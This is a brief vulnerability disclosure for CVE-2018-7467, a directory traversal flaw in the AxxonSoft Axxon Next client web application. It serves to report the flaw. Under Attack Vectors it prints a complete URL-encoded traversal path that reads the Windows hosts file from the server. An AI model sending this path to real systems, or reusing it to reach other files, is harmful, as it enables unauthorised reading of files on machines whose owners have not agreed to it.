AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
8aa82dd140782ee575d7d92ca6ddea9eTitle
AxxonSoft Axxon Next - AxxonSoft Client Directory Traversal via an initial
/css//..%2f substring in a URI. CVE-2018-7467
[Vulnerability Type]
Directory Traversal via an initial /css//..%2f substring in a URI
[Vendor of Product]
AxxonSoft Client
[Affected Product Code Base]
Axxon Next
[Affected Component]
AxxonSoft Client Web Application's Source Code
[Attack Type]
Remote
[Impact Information Disclosure]
true
[Attack Vectors]
It is a Directory Traversal
/css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2fwindows\System32\drivers\etc\hosts
[Discoverer]
Martin A Cicalla Jr